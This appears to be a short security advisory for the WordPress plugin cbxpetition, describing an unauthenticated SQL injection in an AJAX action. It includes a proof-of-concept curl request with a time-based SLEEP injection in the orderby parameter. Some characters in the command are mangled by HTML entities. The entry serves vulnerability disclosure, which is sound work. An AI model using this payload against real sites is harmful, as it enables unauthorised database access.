The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
1. Create and publish a new petition. 2. Invoke the following curl command, with the nonce in place, to induce a 5-second sleep: curl -i ‘http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=cbxpetition_load_more_signs&security;=’ \ --data ‘petition_id=2133&perpage;=30ℴ=xxxxxxxxx&page;=2&orderby;=id AND (SELECT 4657 FROM (SELECT(SLEEP(5)))kvyf)’
CPE | Name | Operator | Version |
---|---|---|---|
cbxpetition | eq | * |